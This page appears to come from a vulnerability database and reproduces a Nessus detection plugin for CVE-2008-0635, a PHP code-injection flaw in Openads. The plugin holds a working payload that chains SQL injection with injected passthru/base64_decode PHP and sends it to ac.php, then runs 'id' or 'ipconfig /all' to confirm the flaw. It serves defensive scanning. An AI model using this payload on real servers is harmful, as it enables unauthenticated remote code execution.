Lucene search

K

Openads Delivery Engine OA_Delivery_Cache_store() Function name Argument Arbitrary PHP Code Execution

Openads Delivery Engine OA_Delivery_Cache_store() Function Argument PHP Code Executio

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2008-0635
6 Feb 200821:00
cve
Prion
Security feature bypass
6 Feb 200821:00
prion
canvas
Immunity Canvas: OPENADS_EXEC
6 Feb 200821:00
canvas
Cvelist
CVE-2008-0635
6 Feb 200820:00
cvelist
NVD
CVE-2008-0635
6 Feb 200821:00
nvd
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(34372);
  script_version("1.17");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2008-0635");
  script_bugtraq_id(27603);
  script_xref(name:"SECUNIA", value:"28790");

  script_name(english:"Openads Delivery Engine OA_Delivery_Cache_store() Function name Argument Arbitrary PHP Code Execution");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that allows injection
of arbitrary PHP commands.");
  script_set_attribute(attribute:"description", value:
"The remote host is running Openads, an open source ad serving
application written in PHP. 

The installed version of Openads contains a vulnerability in its
delivery engine in that it fails to properly sanitize input to the
'name' argument of the 'OA_Delivery_Cache_store()' function in various
scripts under 'www/delivery' before saving it in a cache file.  An
unauthenticated, remote attacker can exploit this issue to inject
arbitrary PHP code and then execute it on the remote host, subject to
the privileges under which the web server operates.");
  script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/archive/1/487486/100/0/threaded");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Openads 2.4.3 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:"CANVAS");
  script_cwe_id(94);

  script_set_attribute(attribute:"plugin_publication_date", value:"2008/10/09");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2008-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl", "os_fingerprint.nasl");
  script_require_keys("www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");

port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);


os = get_kb_item("Host/OS");
if (os)
{
  if ("Windows" >!< os) cmd = "id";
  else cmd = "ipconfig /all";
  cmds = make_list(cmd);
}
else cmds = make_list("id", "ipconfig /all");
cmd_pats = make_array();
cmd_pats["id"] = "uid=[0-9]+.*gid=[0-9]+.*";
cmd_pats["ipconfig /all"] = "Windows IP Configuration";

# Loop through directories.
if (thorough_tests) dirs = list_uniq(make_list("/openads", "/ads", "/adserver", "/openx", cgi_dirs()));
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Inject our exploit.
  #
  # nb: we also leverage a SQL injection issue to avoid having to find
  #     a valid bannerid; without it, OA_Delivery_Cache_buildFileName()
  #     won't be called and the exploit won't work.
  fake_srv = string("NESSUS_", toupper(rand_str()));
  exploit = string("-", unixtime(), " OR 1=1 -- ';passthru(base64_decode($_SERVER[HTTP_", fake_srv, "]));die;/*");
  url = string(
    dir, "/www/delivery/ac.php?",
    "bannerid=", str_replace(find:" ", replace:"+", string:exploit)
  );

  w = http_send_recv3(method:"GET", item:url, port:port);
  if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");
  res = w[2];

  # If we see an ad...
  if ("www/delivery/ck.php?oaparams=" >< res)
  {
    # Try to execute a command.
    foreach cmd (cmds)
    {
      w = http_send_recv3(method:"GET", item:url, port:port,
      	add_headers: make_array(fake_srv, base64(str:cmd)));
      #  if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");
      if (isnull(w)) res = NULL; else res = w[2];
      # nb: res will be NULL if the command fails!
      # MA 2009-12-11: did this mean that the server would not return a correct answer
      # or just an empty body?

      # There's a problem if we see output from our command.
      if (egrep(pattern:cmd_pats[cmd], string:res))
      {
        if (report_verbosity)
        {
          output = "";
          foreach line (split(res, keep:TRUE))
            output += ereg_replace(pattern:'^[ \t]*', replace:"  ", string:line);
          output = data_protection::sanitize_uid(output:output);
          report = string(
            "\n",
            "Nessus was able to execute the command '", cmd, "' on the remote\n",
            "host. This produced the following results :\n",
            "\n",
            output
          );
          security_hole(port:port, extra:report);
        }
        else security_hole(port);
        exit(0);
      }
    }
  }
}

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
09 Oct 2008 00:00Current
0.3Low risk
Vulners AI Score0.3
CVSS27.5
EPSS0.016
12
.json
Report